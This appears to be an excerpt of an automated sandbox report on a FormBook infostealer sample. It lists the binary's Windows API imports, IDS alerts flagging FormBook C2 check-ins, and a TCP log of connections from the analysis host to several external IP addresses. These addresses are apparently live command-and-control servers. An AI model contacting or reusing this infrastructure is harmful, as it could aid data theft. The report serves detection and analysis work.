                                                 USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                 GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                 COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
                                                 ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                 SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                 ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                 OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                 Language of compilation system | Country where language is spoken
                                                 English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T06:54:42.343238+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50024 | 46.38.243.234 | 80 | TCP
2025-01-11T06:54:42.343238+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50024 | 46.38.243.234 | 80 | TCP
2025-01-11T06:55:28.274099+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:28.274099+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:44.858916+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49789 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:47.405795+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49805 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:49.952696+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49825 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:52.580528+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49842 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:52.580528+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49842 | 47.83.1.90 | 80 | TCP
2025-01-11T06:55:58.437669+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49882 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:00.988683+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49899 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:03.565517+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49915 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:06.120981+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49928 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:06.120981+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49928 | 185.151.30.223 | 80 | TCP
2025-01-11T06:56:12.053749+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49968 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:14.744445+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49988 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:17.764973+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50005 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:19.683968+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50016 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:19.683968+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50016 | 176.57.65.76 | 80 | TCP
2025-01-11T06:56:25.298946+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50017 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:27.861751+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50018 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:30.418867+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:32.949886+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50020 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:32.949886+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50020 | 209.74.79.41 | 80 | TCP
2025-01-11T06:56:39.530934+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 46.38.243.234 | 80 | TCP
2025-01-11T06:56:42.077713+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50022 | 46.38.243.234 | 80 | TCP
2025-01-11T06:56:44.624617+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 46.38.243.234 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:55:26.645617962 CET | 49736 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:26.650449991 CET | 80 | 49736 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:26.650536060 CET | 49736 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:26.670206070 CET | 49736 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:26.676326036 CET | 80 | 49736 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:28.273789883 CET | 80 | 49736 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:28.274049044 CET | 80 | 49736 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:28.274099112 CET | 49736 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:28.279648066 CET | 49736 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:28.284514904 CET | 80 | 49736 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:43.334768057 CET | 49789 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:43.339718103 CET | 80 | 49789 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:43.342349052 CET | 49789 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:43.356867075 CET | 49789 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:43.361737967 CET | 80 | 49789 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:44.858916044 CET | 49789 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:44.863899946 CET | 80 | 49789 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:44.863971949 CET | 49789 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:45.877547979 CET | 49805 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:45.883393049 CET | 80 | 49805 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:45.885066986 CET | 49805 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:45.902787924 CET | 49805 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:45.907708883 CET | 80 | 49805 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:47.405795097 CET | 49805 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:47.412300110 CET | 80 | 49805 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:47.412384987 CET | 49805 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:48.424403906 CET | 49825 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:48.429229021 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.429544926 CET | 49825 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:48.444037914 CET | 49825 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:48.450006008 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450021029 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450046062 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450057983 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450072050 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450090885 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450103045 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450114965 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:48.450130939 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:49.952696085 CET | 49825 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:49.958148003 CET | 80 | 49825 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:49.958266973 CET | 49825 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:50.977791071 CET | 49842 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:50.982863903 CET | 80 | 49842 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:50.982949972 CET | 49842 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:50.992594957 CET | 49842 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:50.997441053 CET | 80 | 49842 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:52.580343008 CET | 80 | 49842 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:52.580367088 CET | 80 | 49842 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:52.580528021 CET | 49842 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:52.583429098 CET | 49842 | 80 | 192.168.2.4 | 47.83.1.90
Jan 11, 2025 06:55:52.588248968 CET | 80 | 49842 | 47.83.1.90 | 192.168.2.4
Jan 11, 2025 06:55:57.662815094 CET | 49882 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:55:57.668303967 CET | 80 | 49882 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:55:57.668380022 CET | 49882 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:55:57.683901072 CET | 49882 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:55:57.688766003 CET | 80 | 49882 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:55:58.437335014 CET | 80 | 49882 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:55:58.437621117 CET | 80 | 49882 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:55:58.437669039 CET | 49882 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:55:59.187009096 CET | 49882 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:00.206137896 CET | 49899 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:00.210975885 CET | 80 | 49899 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:00.211074114 CET | 49899 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:00.226214886 CET | 49899 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:00.231118917 CET | 80 | 49899 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:00.988415956 CET | 80 | 49899 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:00.988481998 CET | 80 | 49899 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:00.988682985 CET | 49899 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:01.733966112 CET | 49899 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:02.763073921 CET | 49915 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:02.767987013 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.768420935 CET | 49915 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:02.783718109 CET | 49915 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:02.788573027 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788603067 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788613081 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788651943 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788656950 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788682938 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788686991 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788784027 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:02.788794041 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:03.564677954 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:03.565464973 CET | 80 | 49915 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:03.565516949 CET | 49915 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:04.296416998 CET | 49915 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:05.315331936 CET | 49928 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:05.320173025 CET | 80 | 49928 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:05.322011948 CET | 49928 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:05.329883099 CET | 49928 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:05.334703922 CET | 80 | 49928 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:06.120812893 CET | 80 | 49928 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:06.120857954 CET | 80 | 49928 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:06.120980978 CET | 49928 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:06.124346018 CET | 49928 | 80 | 192.168.2.4 | 185.151.30.223
Jan 11, 2025 06:56:06.129173040 CET | 80 | 49928 | 185.151.30.223 | 192.168.2.4
Jan 11, 2025 06:56:11.361875057 CET | 49968 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:11.366727114 CET | 80 | 49968 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:11.366825104 CET | 49968 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:11.381519079 CET | 49968 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:11.386401892 CET | 80 | 49968 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:12.053580999 CET | 80 | 49968 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:12.053699017 CET | 80 | 49968 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:12.053749084 CET | 49968 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:12.890583038 CET | 49968 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:13.917036057 CET | 49988 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:13.922013044 CET | 80 | 49988 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:13.922108889 CET | 49988 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:13.942823887 CET | 49988 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:13.947874069 CET | 80 | 49988 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:14.744049072 CET | 80 | 49988 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:14.744388103 CET | 80 | 49988 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:14.744445086 CET | 49988 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:15.452717066 CET | 49988 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:16.471626043 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:16.476622105 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.476778030 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:16.492037058 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:16.492074013 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:16.497870922 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497884035 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497932911 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497941971 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497977018 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497986078 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.497997999 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.499003887 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:16.499018908 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:17.764714956 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:17.764879942 CET | 80 | 50005 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:17.764972925 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:17.999583960 CET | 50005 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.018285990 CET | 50016 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.023566008 CET | 80 | 50016 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:19.024456978 CET | 50016 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.033027887 CET | 50016 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.037786961 CET | 80 | 50016 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:19.683763981 CET | 80 | 50016 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:19.683828115 CET | 80 | 50016 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:19.683968067 CET | 50016 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.686676979 CET | 50016 | 80 | 192.168.2.4 | 176.57.65.76
Jan 11, 2025 06:56:19.691458941 CET | 80 | 50016 | 176.57.65.76 | 192.168.2.4
Jan 11, 2025 06:56:24.713368893 CET | 50017 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:24.718193054 CET | 80 | 50017 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:24.718297005 CET | 50017 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:24.734296083 CET | 50017 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:24.739083052 CET | 80 | 50017 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:25.298573971 CET | 80 | 50017 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:25.298639059 CET | 80 | 50017 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:25.298945904 CET | 50017 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:26.249771118 CET | 50017 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:27.268661976 CET | 50018 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:27.273493052 CET | 80 | 50018 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:27.273598909 CET | 50018 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:27.288276911 CET | 50018 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:27.293060064 CET | 80 | 50018 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:27.861274004 CET | 80 | 50018 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:27.861443043 CET | 80 | 50018 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:27.861751080 CET | 50018 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:28.796533108 CET | 50018 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:29.815419912 CET | 50019 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:29.820652962 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.820787907 CET | 50019 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:29.836471081 CET | 50019 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:29.841295004 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841305971 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841820955 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841830015 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841836929 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841845036 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841849089 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841851950 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:29.841856003 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:30.418767929 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:30.418782949 CET | 80 | 50019 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:30.418867111 CET | 50019 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:31.343358994 CET | 50019 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.361959934 CET | 50020 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.366871119 CET | 80 | 50020 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:32.366964102 CET | 50020 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.376277924 CET | 50020 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.381134033 CET | 80 | 50020 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:32.948417902 CET | 80 | 50020 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:32.949805975 CET | 80 | 50020 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:32.949886084 CET | 50020 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.951567888 CET | 50020 | 80 | 192.168.2.4 | 209.74.79.41
Jan 11, 2025 06:56:32.957118034 CET | 80 | 50020 | 209.74.79.41 | 192.168.2.4
Jan 11, 2025 06:56:37.999272108 CET | 50021 | 80 | 192.168.2.4 | 46.38.243.234
